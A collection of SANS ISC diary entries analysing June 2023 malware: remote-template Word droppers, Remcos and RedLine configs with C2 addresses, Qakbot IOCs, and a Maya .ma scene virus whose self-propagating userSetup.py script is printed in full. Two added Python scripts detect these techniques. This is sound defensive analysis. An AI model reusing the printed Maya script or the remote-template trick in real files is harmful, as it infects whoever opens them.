SANS


ISC Stormcast For Monday, June 26th, 2023 https://isc.sans.edu/podcastdetail/8550, (Mon, Jun 26th)
Email Spam with Attachment Modiloader, (Sat, Jun 24th)
This week (2023-06-21) I found 2 email attachments in quarantine that had different text with the same attachment. The first one had an Office 365 message indicating the admin had set up a custom rule to block the message, that it could not be delivered to the recipients, and what to do to fix it.
This attachment is well detected by multiple AV vendors as a trojan downloader. I used AssemblyLine [1] to analyse this zip file (9658904352011.zip) [2] and recovered a long list of indicators from the analysis. Brad [3] published a similar diary about Modiloader last month.
AssemblyLine classifies the indicators as informative, suspicious or malicious during the analysis.
Emerging Threat Signature
ET MALWARE FormBook CnC Checkin (GET)
Indicators of Compromise - Malicious
atlas-management.tech
94.73.149.144
Indicators of Compromise - Suspicious
SHA256 Hashes
38b0084c5d02a04696027b5f58eaf6f528af5ba303f67f8cdf2d193a267beda8
fe9f53f107e573b8ab26e52e4f894d5f157b57e81a828ff4e530c3741c0006d5
SSDEEP
24:hYIJAC8kMxMg8p0MlgAtHQTVC94yXzeUt2:OPxMvpflmVC946aUc
12288:mJJqvi0qOhfCAUBBzjjSphHrqFDq++ByPcwie8EWnLI4jREohPXYKC:mJshqECZ3njSnHrqFgwdePL/VE8fDC
[1] https://isc.sans.edu/diary/Assemblyline+as+a+Malware+Analysis+Sandbox/29510
[2] https://www.virustotal.com/gui/file/38b0084c5d02a04696027b5f58eaf6f528af5ba303f67f8cdf2d193a267beda8
[3] https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896
[4] https://community.emergingthreats.net/
[5] https://tria.ge/s/family:modiloader
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
Word Document with an Online Attached Template, (Fri, Jun 23rd)
It has been a while since I spotted this kind of document. Yesterday, I found a Word document (SHA256:5070e8a3fdaf3027170ade066eaf7f8e384c1cd25ce58af9155627975f97d156)[1] behaving like a dropper.
The document itself was pretty basic. It just displayed a basic screen capture of an Excel dialog box:
But, once loaded, a brief pop-up window is displayed, mentioning an HTTP request to an external website. The document does not contain any VBA macro, payload or exploit.
Here is the magic used by the attacker: he used a Word template. Microsoft Word has a feature that helps the user create a document from a template. The template is opened and applied to the original document when the document is opened. The magic is here: in Microsoft Windows, everything can be loaded from a “local” location (the filesystem) but also from an “online” place (read: the Internet).
To manage the templates, you need to activate the "Developer" menu in Word (via the options panel), and a new window will be available:
This document uses a template stored on a remote web server. How to verify this? In the OOXML file “./word/_rels/settings.xml.rels”, you can spot this:
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxps://reducereducereducereducereducereducereducereducereducereducereducereducereduce@reduced[.]to/kxey0" TargetMode="External"/>
</Relationships>
Note that the attacker uses basic authentication to restrict access to the document. Unfortunately, the URL has already been cleaned, but with some OSINT, I could find the template used here.
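The check described above, as an added example (not code from the diary or from Microsoft): it opens a .docx as the OOXML zip it is, reads word/_rels/settings.xml.rels, and reports every attachedTemplate relationship, whether its TargetMode is External and whether the URL carries a user@ part. The .docx built inside is a constructed minimal package with a placeholder template URL, not the diary's sample.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
RELS_PART = "word/_rels/settings.xml.rels"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def attached_templates(docx_bytes):
    """One dict per attachedTemplate relationship found in settings.xml.rels."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PART not in zf.namelist():
            return findings
        root = ET.fromstring(zf.read(RELS_PART))
    for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE:
            continue
        target = rel.get("Target", "")
        parts = urlsplit(target)
        findings.append({
            "id": rel.get("Id"),
            "target": target,
            "external": rel.get("TargetMode", "Internal") == "External",
            "host": parts.hostname or "",
            # userinfo before the host: the basic-auth style URL seen in the diary
            "has_userinfo": "@" in parts.netloc,
        })
    return findings


def is_remote_template_dropper(docx_bytes):
    """True when Word would fetch the attached template from the network."""
    return any(f["external"] for f in attached_templates(docx_bytes))


def build_sample_docx(remote=True):
    """Constructed minimal .docx (not the diary's sample). With remote=True it
    carries an external attachedTemplate relationship with a placeholder URL."""
    parts = {
        "[Content_Types].xml":
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "word/document.xml":
            f'<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="{W_NS}"><w:body/></w:document>',
        "word/settings.xml":
            f'<?xml version="1.0" encoding="UTF-8"?><w:settings xmlns:w="{W_NS}" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>',
    }
    if remote:
        parts[RELS_PART] = (
            '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{PKG_NS}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            'Target="https://user@template.example/kxey0" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in attached_templates(build_sample_docx()):
        print(finding)
```

Point attached_templates() at the bytes of a real .docx to triage it; a relationship with TargetMode="External" is the signal, whatever the URL looks like.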
The file (SHA256:a7056b7ae82c04e4ff2e674ddf76d08ac7e89baa4d18bc17059eaba9c522cb3d)[2] is an RTF file, and such files usually contain an exploit or a malicious payload. This one tries to exploit the good old Equation Editor (again and again) to drop a Remcos RAT (SHA256:9d6ead1f911aa56ad0d3bb44131f22f0064d7c553c86d1d518d35247af49d488)[3]. Here is the extracted config related to the campaign:
{
  "c2": [
    "89[.]37[.]99[.]49:5888"
  ],
  "attr": {
    "mutex": "Rmc-LESPRM",
    "copy_file": "remcos.exe",
    "hide_file": false,
    "copy_folder": "Remcos",
    "delete_file": false,
    "keylog_file": "logs.dat",
    "keylog_flag": false,
    "audio_folder": "MicRecords",
    "install_flag": false,
    "keylog_crypt": false,
    "mouse_option": false,
    "connect_delay": "0",
    "keylog_folder": "remcos",
    "screenshot_flag": false,
    "screenshot_path": "%AppData%",
    "screenshot_time": "10",
    "connect_interval": "1",
    "hide_keylog_file": false,
    "screenshot_crypt": false,
    "audio_record_time": "5",
    "screenshot_folder": "Screenshots",
    "take_screenshot_time": "5",
    "take_screenshot_option": false
  },
  "rule": "Remcos",
  "botnet": "RemoteHost",
  "family": "remcos"
}
I like to call this technique a “Matryoshka Document” (or Russian dolls) because a document is dropped by the first one, then another one, etc.
[1] https://www.virustotal.com/gui/file/5070e8a3fdaf3027170ade066eaf7f8e384c1cd25ce58af9155627975f97d156/telemetry
[2] https://www.virustotal.com/gui/file/a7056b7ae82c04e4ff2e674ddf76d08ac7e89baa4d18bc17059eaba9c522cb3d
[3] https://www.virustotal.com/gui/file/9d6ead1f911aa56ad0d3bb44131f22f0064d7c553c86d1d518d35247af49d488
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
ISC Stormcast For Friday, June 23rd, 2023 https://isc.sans.edu/podcastdetail/8548, (Fri, Jun 23rd)
Qakbot (Qbot) activity, obama271 distribution tag, (Thu, Jun 22nd)
Introduction
Qakbot using the obama-series distribution tag has been active this week on Tuesday 2023-06-20 (obama269), Wednesday 2023-06-21 (obama270), and Thursday 2023-06-22 (obama271). Today's diary provides indicators from an infection and some samples collected today from the obama271 wave on Thursday 2023-06-22.
Shown above: Flow chart for today's obama271 Qakbot infection.
Initial Infection Traffic
The initial infection started with an HTTP URL ending in .gif that returned a zip archive. After extracting a .js file from the downloaded zip and running it, we see HTTPS traffic with the domain that returned our Qakbot DLL. Qakbot C2 traffic includes HTTPS requests to legitimate domains like oracle.com as noted below. Finally, we saw Qakbot HTTPS C2 traffic on 142.154.58[.]207 almost eight minutes after the Qakbot DLL was retrieved.
Shown above: Traffic from the infection filtered in Wireshark.
Indicators of compromise (IOCs)
2023-06-22 (THURSDAY): OBAMA271 QAKBOT (QBOT) ACTIVITY
INFECTION CHAIN:
email --> PDF attachment --> link from PDF --> downloaded zip --> extracted .js --> retrieves/runs Qakbot DLL
SIX EXAMPLES OF PDF ATTACHMENTS:
LINKS FROM ATTACHED PDF FILES:
FILES USED FOR AN INFECTION RUN:
SHA256 hash: d32e1cc5c161ae0fd8ae6c11cb6df5bce79690d1c533b4a5b9140ed8cb005f21
File size: 79,478 bytes
Downloaded from: hxxp://rolopom[.]com/alfqtwrbcn/alfqtwrbcn.gif
File name: BSN-1226578580.zip
File description: Zip archive downloaded from link in PDF attachment
SHA256 hash: c465f039b08c3320fdce5f63992b5363b96c21d6e3b1da1df1e38caf65482caa
File size: 350,611 bytes
File name: BSN-1226578580.js
File description: JS file extracted from the above zip archive
URLS GENERATED BY THE ABOVE .JS FOR QAKBOT DLL:
QAKBOT DLL SEEN DURING THE INFECTION RUN:
SHA256 hash: 98bf24844d138dfd50188f3325f13ea3a1cde4d650900ae1d6820a2b1d4a59fd
File size: 1,405,439 bytes
Downloaded from: hxxp://hevintar[.]com/0.38107541532568295.dat
File location: C:\VPNStors\Krosters\Spote.OCCXX
Run method: rundll32.exe [file name],zertc
Final Words
A pcap of the infection traffic, along with the associated malware and artifacts, can be found here.
---
Brad Duncan
brad [at] malware-traffic-analysis.net
Apple Patches Exploited Vulnerabilities in iOS/iPadOS, macOS, watchOS and Safari, (Thu, Jun 22nd)
Apple released iOS, macOS, and watchOS updates, patching three vulnerabilities already being exploited. Two vulnerabilities affect WebKit, leading to a Safari patch for older operating systems.
The two WebKit issues (CVE-2023-32439 and CVE-2023-32435) can be used to execute arbitrary code as a user visits a malicious web page. The third vulnerability, CVE-2023-32434, can be used to elevate privileges after the initial code execution.
See below for affected operating systems. Apple does not provide CVSS scores, so we asked ChatGPT to fill them in.
CVE-2023-32439 (WebKit)
A type confusion issue was addressed with improved checks.
Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
CVE-2023-32434 [important] ChatGPT-CVSS: 8.8 *** EXPLOITED *** Kernel
An integer overflow was addressed with improved input validation.
An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
CVE-2023-32435 [critical] ChatGPT-CVSS: 7.8 *** EXPLOITED *** WebKit
A memory corruption issue was addressed with improved state management.
Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter
ISC Stormcast For Thursday, June 22nd, 2023 https://isc.sans.edu/podcastdetail/8546, (Thu, Jun 22nd)
Analyzing a YouTube Sponsorship Phishing Mail and Malware Targeting Content Creators, (Wed, Jun 21st)
One of our Stormcast listeners, Kevin, wrote in to share that his friend Jon had received a direct spear-phishing e-mail. We requested more information, and Jon kindly provided us with the corresponding e-mails and data to analyze. The spear-phishing e-mail sent to Jon masqueraded as an individual representing NordVPN (note: NordVPN had published an advisory about scammers posing as NordVPN representatives earlier this year [1]) and enquired about the possibility of a YouTube sponsorship/collaboration with his YouTube channel. I took the liberty of examining the phishing e-mail and its associated artifacts, noting the details I observed from my analysis.
I first examined the e-mail headers, noting the mail.ru header in the X-Mailer field (with reference to Figure 1). The e-mail address that the adversary used was collaboration@nordvpn-media[.]com, which had a very close domain name to the original domain name (nordvpnmedia[.]com) that NordVPN had stated to be genuine [1].
I went through the content of the e-mail, and it revolved around discussing the purported sponsorship details. However, another small titbit caught my eye (with reference to Figure 2).
Figure 2: Russian Characters Within E-Mail Thread
I noticed the presence of Russian characters within the e-mail thread. The Russian characters (highlighted within the red box) translate to “Monday, 19 June 2023”, and a UTC offset of +3 was observed. A quick search for the time zones used in Russia indicates that UTC+3 is currently being used for Moscow.
I turned my attention to the domain nordvpn-media[.]com and wondered who had registered the domain. After checking the Whois records, it appeared that the site was hosted in Russia and registered since March 5th, 2023 (Figure 3). However, the hosting provider seemed to have blocked the page. Unfortunately, a little journey to the Wayback Machine did not yield any decent results either.
There was a pdf file titled “NordVPN® Media-Kit for YT Partners.pdf”. I wondered if there were any malicious files embedded within it and proceeded to perform some PDF file analysis. I first used exiftool to gather some basic metadata of the attached PDF file (Figure 4). It was interesting to observe that though Figure 2 had a UTC offset of +3, Figure 4 showed that the modification date of the file had a UTC offset of +2.
Figure 4: Output of Metadata after Executing Exiftool
Our SANS ISC Handler, Didier Stevens, has published many excellent tools [2]. I took the opportunity to use one of the tools he created, pdfid.py, to investigate if the PDF file was malicious. With reference to Figure 5, the file appeared to be harmless.
Figure 5: Output of pdfid.py
I proceeded to investigate the attached PDF file, and Figure 6 shows the content of the rendered PDF file. I briefly investigated the name used in the top left of the PDF file. While the name was associated with a few reviews of NordVPN submitted online, the picture that was used was lifted off the first Google result of the utilized name. There was also a Download button within the PDF file, hyperlinked to a Dropbox link (hxxps://www[.]dropbox[.]com/s/4b9cqh7oxlq4g0t/NordVPN®%20Promotional%20Materials%20June%202023[.]rar?dl=1).
Figure 6: Screenshot of Attached PDF File in the E-mail
Clicking on the link would immediately trigger a download of the compressed RAR archive. Unpacking the RAR file (with the password shown in the PDF) would yield 3 files, as shown in Figure 7.
Figure 7: Output of the RAR Archive
Of the 3 files, only the .exe file appeared suspicious. The other 2 files (.txt and .mp4) had previously been uploaded to VirusTotal. I performed brief static and dynamic analysis of the .exe file, and obtained a few interesting observations. For example, I found a reference to a .pdb file named plan4cvartal2otchet.pdb (possibly Russian, given the earlier observations). The executable also had an imphash of f34d5f2d4577ed6d9ceec516c1f5a744, and I found at least one other similar piece of malware that was uploaded on June 10, 2023 (albeit with a different hash) [3]. The following information was also extracted:
{
"c2": [
"176.113.115.23:27556"
],
"attr": {
"auth_value": "9d33ed88bc78fe9fbb90806afbd547df"
},
"rule": "RedLine",
"botnet": "kek18",
"family": "redline"
}
A quick literature review online yielded several references to the RedLine Stealer, which is often transacted in underground forums [4]. This malware is capable of exfiltrating a variety of data such as saved passwords, credit card data, computer and username configuration, and even stealing cryptocurrency [4]. Although this incident may be isolated, it demonstrates the possibility of a potential campaign towards unsuspecting content creators who genuinely want to have fruitful collaborations with global brands on popular platforms such as YouTube, Instagram and TikTok. With the ability to purchase malware as a subscription or as a standalone product via underground means [4], the complexity of pulling off similar cyber heists has been greatly reduced for current and budding cybercriminal groups. Constant vigilance when receiving unsolicited e-mail is vital, no matter how tempting a collaboration offer appears to be.
Indicators of Compromise (IoCs):
45.130.41.17
nordvpn-media[.]com
collaboration@nordvpn-media[.]com
hxxps://www[.]dropbox[.]com/s/4b9cqh7oxlq4g0t/NordVPN®%20Promotional%20Materials%20June%202023[.]rar?dl=1
a6f54e972c40ac38a958c3ee10343e49992ad1d6 (SHA1 hash of NordVPN® Media-Kit for YT Partners.pdf)
612cf3ed13976c7b20d4ae1a7832105ac1982a6e (SHA1 Hash of NordVPN® Promotional Materials June 2023.rar)
c8c73d8a25872d0c5300cea264f92abe3993feee (NORDVPN® MEDIA KIT FOR YT PARTNERS JUNE 2023.exe)
176.113.115.23 (C2)
References:
1. https://nordvpn.com/blog/nordvpn-creators-scam/
2. https://blog.didierstevens.com/my-software/
3. https://www.virustotal.com/gui/file/12ab0f4389fb376011431b9ffc35cd90447edc980b75574b6b376ef0fd50fd59/details
4. https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
-----------
Yee Ching Tok, Ph.D., ISC Handler
Personal Site
Mastodon
Twitter
Malicious Code Can Be Anywhere, (Tue, Jun 20th)
My Python hunting rules reported some interesting/suspicious files. The files are named with a “.ma” extension. Some of them have very low VT scores. For example, the one with a SHA256 dc16115d165a8692e6f3186afd28694ddf2efe7fd3e673bd90690f2ae7d59136 has a score of 15/59.
The “.ma” extension refers to animation projects created by Autodesk Maya, a 3D modeling and animation program[1]. The files are typically ASCII files that describe the 3D scenes. I have absolutely zero knowledge of 3D software, but after some Google searches, it seems that Maya supports Python![2] As the documentation says:
“Python scripting can be used for many tasks in Maya, from running simple commands to developing plug-ins, and several different Maya-related libraries are available targeting different tasks.”
What could go wrong? If attackers (ab)use VBA macros in Microsoft Office, why not (ab)use Python in Maya? I found a reference to this type of malware back in 2020 when people discovered some “strange behaviors” in .ma files.
Here is a piece of script linked to a “createNode” action:
createNode script -n "vaccine_gene"; rename -uid "9AA7A497-4607-1F0C-931D-E6ABE655FB34"; addAttr -ci true -sn "nts" -ln "notes" -dt "string"; setAttr ".b" -type "string" "petri_dish_path = cmds.internalVar(userAppDir=True) + 'scripts/userSetup.py'\npetri_dish_gene = ['import sys\\r\\n', 'import maya.cmds as cmds\\r\\n', \"maya_path = cmds.internalVar(userAppDir=True) + '/scripts'\\r\\n\", 'if maya_path not in sys.path:\\r\\n', ' sys.path.append(maya_path)\\r\\n', 'import vaccine\\r\\n', \"cmds.evalDeferred('leukocyte = vaccine.phage()')\\r\\n\", \"cmds.evalDeferred('leukocyte.occupation()')\"]\nwith open(petri_dish_path, \"w\") as f:\n\tf.writelines(petri_dish_gene)"; setAttr ".st" 1; setAttr ".stp" 1; setAttr ".nts" -type "string" ( "['# coding=utf-8\\r\\n', '# @Time : 2020/07/05 15:46\\r\\n', '# @Author : \\xe9\\xa1\\xb6\\xe5\\xa4\\xa9\\xe7\\xab\\x8b\\xe5\\x9c\\xb0\\xe6\\x99\\xba\\xe6\\x85\\xa7\\xe5\\xa4\\xa7\\xe5\\xb0\\x86\\xe5\\x86\\x9b\\r\\n', '# @File : vaccine.py\\r\\n', '# \\xe4\\xbb\\x85\\xe4\\xbd\\x9c\\xe4\\xb8\\xba\\xe5\\x85\\xac\\xe5\\x8f\\xb8\\xe5\\x86\\x85\\xe9\\x83\\xa8\\xe4\\xbd\\xbf\\xe7\\x94\\xa8\\xe4\\xbf\\x9d\\xe6\\x8a\\xa4 \\xe4\\xb8\\x80\\xe6\\x97\\xa6\\xe6\\xb3\\x84\\xe9\\x9c\\xb2\\xe5\\x87\\xba\\xe5\\x8e\\xbb\\xe9\\x80\\xa0\\xe6\\x88\\x90\\xe7\\x9a\\x84\\xe5\\xbd\\xb1\\xe5\\x93\\x8d \\xe6\\x9c\\xac\\xe4\\xba\\xba\\xe6\\xa6\\x82\\xe4\\xb8\\x8d\\xe8\\xb4\\x9f\\xe8\\xb4\\xa3\\r\\n', 'import maya.cmds as cmds\\r\\n', 'import os\\r\\n', 'import shutil\\r\\n', '\\r\\n', '\\r\\n', 'class phage:\\r\\n', ' @staticmethod\\r\\n', ' def backup(path):\\r\\n', \" folder_path = path.rsplit('/', 1)[0]\\r\\n\", \" file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]\\r\\n\", \" backup_folder = folder_path + '/history'\\r\\n\", \" new_file = backup_folder + '/' + file_name + '_backup.ma '\\r\\n\", ' if not os.path.exists(backup_folder):\\r\\n', ' os.makedirs(backup_folder)\\r\\n', ' shutil.copyfile(path, new_file)\\r\\n', '\\r\\n', ' def 
antivirus(self):\\r\\n', ' health = True\\r\\n', ' self.clone_gene()\\r\\n', ' self.antivirus_virus_base()\\r\\n', \" virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']\\r\\n\", ' all_script_jobs = cmds.scriptJob(listJobs=True)\\r\\n', ' for each_job in all_script_jobs:\\r\\n', ' for each_gene in virus_gene:\\r\\n', ' if each_gene in each_job:\\r\\n', ' health = False\\r\\n', \" job_num = int(each_job.split(':', 1)[0])\\r\\n\", ' cmds.scriptJob(kill=job_num, force=True)\\r\\n', \" all_script = cmds.ls(type='script')\\r\\n\", ' if all_script:\\r\\n', ' for each_script in all_script:\\r\\n', \" commecnt = cmds.getAttr(each_script + '.before')\\r\\n\", ' for each_gene in virus_gene:\\r\\n', ' if commecnt:\\r\\n', ' if each_gene in commecnt:\\r\\n', ' try:\\r\\n', ' cmds.delete(each_script)\\r\\n', ' except:\\r\\n', \" name_space = each_script.rsplit(':',1)[0]\\r\\n\", \" cmds.error(u'{}\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe6\\xb2\\xa1\\xe6\\xb3\\x95\\xe5\\x88\\xa0\\xe9\\x99\\xa4'.format(name_space))\\r\\n\", ' if not health:\\r\\n', ' file_path = cmds.file(query=True, sceneName=True)\\r\\n', ' self.backup(file_path)\\r\\n', ' cmds.file(save=True)\\r\\n', \" cmds.error(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe8\\xb4\\xb4\\xe5\\xbf\\x83\\xe7\\x9a\\x84\\xe4\\xb8\\xba\\xe6\\x82\\xa8\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe5\\xa4\\x87\\xe4\\xbb\\xbd\\xe4\\xba\\x86~\\xe4\\xb8\\x8d\\xe7\\x94\\xa8\\xe8\\xb0\\xa2~')\\r\\n\", ' else:\\r\\n', \" 
cmds.warning(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xb4\\xbc\\xe5\\x81\\xa5\\xe5\\xba\\xb7~\\xe6\\x88\\x91\\xe5\\xb0\\xb1\\xe8\\xaf\\xb4\\xe4\\xb8\\x80\\xe5\\xa3\\xb0\\xe6\\xb2\\xa1\\xe6\\x9c\\x89\\xe5\\x88\\xab\\xe7\\x9a\\x84\\xe6\\x84\\x8f\\xe6\\x80\\x9d')\\r\\n\", '\\r\\n', ' @staticmethod\\r\\n', ' def antivirus_virus_base():\\r\\n', \" virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'\\r\\n\", ' if os.path.exists(virus_base):\\r\\n', ' try:\\r\\n', ' os.remove(virus_base)\\r\\n', ' except:\\r\\n', \" cmds.error(u'\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xa4\\xb1\\xe8\\xb4\\xa5')\\r\\n\", '\\r\\n', ' def clone_gene(self):\\r\\n', \" vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'\\r\\n\", \" if not cmds.objExists('vaccine_gene'):\\r\\n\", ' if os.path.exists(vaccine_path):\\r\\n', ' gene = list()\\r\\n', ' with open(vaccine_path, \"r\") as f:\\r\\n', ' for line in f.readlines():\\r\\n', ' gene.append(line)\\r\\n', ' cmds.scriptNode(st=1,\\r\\n', ' bs=\"petri_dish_path = cmds.internalVar(userAppDir=True) + \\'scripts/userSetup.py\\'\\\\npetri_dish_gene = [\\'import sys\\\\\\\\r\\\\\\\\n\\', \\'import maya.cmds as cmds\\\\\\\\r\\\\\\\\n\\', \\\\\"maya_path = cmds.internalVar(userAppDir=True) + \\'/scripts\\'\\\\\\\\r\\\\\\\\n\\\\\", \\'if maya_path not in sys.path:\\\\\\\\r\\\\\\\\n\\', \\' sys.path.append(maya_path)\\\\\\\\r\\\\\\\\n\\', \\'import vaccine\\\\\\\\r\\\\\\\\n\\', \\\\\"cmds.evalDeferred(\\'leukocyte = vaccine.phage()\\')\\\\\\\\r\\\\\\\\n\\\\\", \\\\\"cmds.evalDeferred(\\'leukocyte.occupation()\\')\\\\\"]\\\\nwith open(petri_dish_path, \\\\\"w\\\\\") as f:\\\\n\\\\tf.writelines(petri_dish_gene)\",\\r\\n', \" n='vaccine_gene', stp='python')\\r\\n\", ' cmds.addAttr(\\'vaccine_gene\\', ln=\"notes\", sn=\"nts\", dt=\"string\")\\r\\n', \" cmds.setAttr('vaccine_gene.notes', gene, type='string')\\r\\n\", \" if not cmds.objExists('breed_gene'):\\r\\n\", ' 
cmds.scriptNode(st=1,\\r\\n', ' bs=\"import os\\\\nvaccine_path = cmds.internalVar(userAppDir=True) + \\'/scripts/vaccine.py\\'\\\\nif not os.path.exists(vaccine_path):\\\\n\\\\tif cmds.objExists(\\'vaccine_gene\\'):\\\\n\\\\t\\\\tgene = eval(cmds.getAttr(\\'vaccine_gene.notes\\'))\\\\n\\\\t\\\\twith open(vaccine_path, \\\\\"w\\\\\") as f:\\\\n\\\\t\\\\t\\\\tf.writelines(gene)\",\\r\\n', \" n='breed_gene', stp='python')\\r\\n\", '\\r\\n', ' def occupation(self):\\r\\n', ' cmds.scriptJob(event=[\"SceneSaved\", \"leukocyte.antivirus()\"], protected=True)\\r\\n']");
The script is not easy to understand due to the huge amount of escaped characters, but it modifies the file "userSetup.py" (located in $MAYA_APP_DIR/<version>/scripts). This file is used to set up the environment at startup time. Think of ".bashrc" for Bash shells.
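An added example (not the diary's code, and not an Autodesk tool): a Python scanner for the pattern above. It walks the createNode script blocks of a Maya ASCII scene, decodes the MEL string literals stored in the .b/.a/.nts attributes, and flags bodies that touch userSetup.py, write files or register scriptJob callbacks. The scene text embedded in it is constructed; the meaning of the .st/.stp values is taken from the scriptNode documentation, and the indicator list is my own choice.

```python
import re

# scriptNode attribute values (Autodesk scriptNode docs):
#   ".st"  scriptType  1 = Open/Close, i.e. the "before" script runs when the scene opens
#   ".stp" sourceType  0 = MEL, 1 = Python
SCRIPT_TYPE_OPEN_CLOSE = 1
SOURCE_TYPE_PYTHON = 1

# (regex, reason) pairs applied to each decoded script body; my own indicator choice.
INDICATORS = [
    (r"userSetup\.(py|mel)", "touches Maya startup script userSetup"),
    (r"\bopen\([^)]*['\"]w['\"]", "opens a file for writing"),
    (r"cmds\.scriptJob\(", "registers a scriptJob callback"),
    (r"cmds\.evalDeferred\(", "defers code execution via evalDeferred"),
    (r"\b(eval|exec)\(", "evaluates dynamically built code"),
    (r"\b(os\.remove|shutil\.)", "deletes or copies files on disk"),
]

NODE_RE = re.compile(r'^script\s+(?:-n|-name)\s+"([^"]+)"\s*;')
# ".b" (before), ".a" (after) and ".nts" (notes) hold MEL string literals, optionally
# wrapped in parentheses as in the diary's sample; backslash escapes are captured raw.
STRING_ATTR_RE = re.compile(
    r'setAttr\s+"\.(b|a|nts)"\s+-type\s+"string"\s+\(?\s*"((?:[^"\\]|\\.)*)"', re.S)
INT_ATTR_RE = re.compile(r'setAttr\s+"\.(st|stp)"\s+(\d+)\s*;')


def unescape_mel(s):
    """Decode the escapes MEL allows inside a double-quoted string literal."""
    mapping = {"n": "\n", "t": "\t", "r": "\r", '"': '"', "\\": "\\"}
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(mapping.get(s[i + 1], s[i + 1]))
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def scan_ma(text):
    """One finding per script node whose stored code matches an indicator."""
    findings = []
    # Split the scene into createNode blocks; chunk 0 is the file header.
    for chunk in re.split(r"(?m)^createNode\s+", text)[1:]:
        m = NODE_RE.match(chunk)
        if not m:
            continue  # transform, mesh, ...: not a script node
        ints = {k: int(v) for k, v in INT_ATTR_RE.findall(chunk)}
        reasons = set()
        for _slot, raw in STRING_ATTR_RE.findall(chunk):
            body = unescape_mel(raw)
            reasons.update(why for pat, why in INDICATORS if re.search(pat, body))
        if reasons:
            findings.append({
                "node": m.group(1),
                "python": ints.get("stp") == SOURCE_TYPE_PYTHON,
                "runs_on_open": ints.get("st") == SCRIPT_TYPE_OPEN_CLOSE,
                "reasons": sorted(reasons),
            })
    return findings


# Constructed Maya ASCII fragment modelled on the diary's sample (not the real file).
SAMPLE_MA = r'''//Maya ASCII 2020 scene
requires maya "2020";
createNode transform -n "pCube1";
	setAttr ".t" -type "double3" 0 1 0 ;
createNode script -n "vaccine_gene";
	setAttr ".b" -type "string" "petri_dish_path = cmds.internalVar(userAppDir=True) + 'scripts/userSetup.py'\nwith open(petri_dish_path, \"w\") as f:\n\tf.writelines(petri_dish_gene)";
	setAttr ".st" 1;
	setAttr ".stp" 1;
createNode script -n "sceneConfigurationScriptNode";
	setAttr ".b" -type "string" "playbackOptions -min 1 -max 120 -ast 1 -aet 200 ";
	setAttr ".st" 6;
'''

if __name__ == "__main__":
    for finding in scan_ma(SAMPLE_MA):
        print(finding)
```

A scene's own sceneConfigurationScriptNode is benign and stays silent here; only the node that writes into the user's scripts folder is reported.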
After more Googling, I found a reference to the same kind of script[3]. In the script above, I found some hex-encoded Chinese text:
- “Infected, but I can't remove it”
- “Your file is infected, but I thoughtfully disinfected it for you and backed it up, thank you”
- “Your file is considered unhealthy, I just say it has no other meaning”
Conclusion: Thanks to modern software with extended script capabilities, executable code can be anywhere!
[1] https://www.autodesk.com/products/maya/overview
[2] https://help.autodesk.com/view/MAYAUL/2020/ENU/?guid=GUID-C0F27A50-3DD6-454C-A4D1-9E3C44B3C990
[3] https://gist.github.com/mottosso/5d4f43a778e9b95d6dcd6a41bb7ae609
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
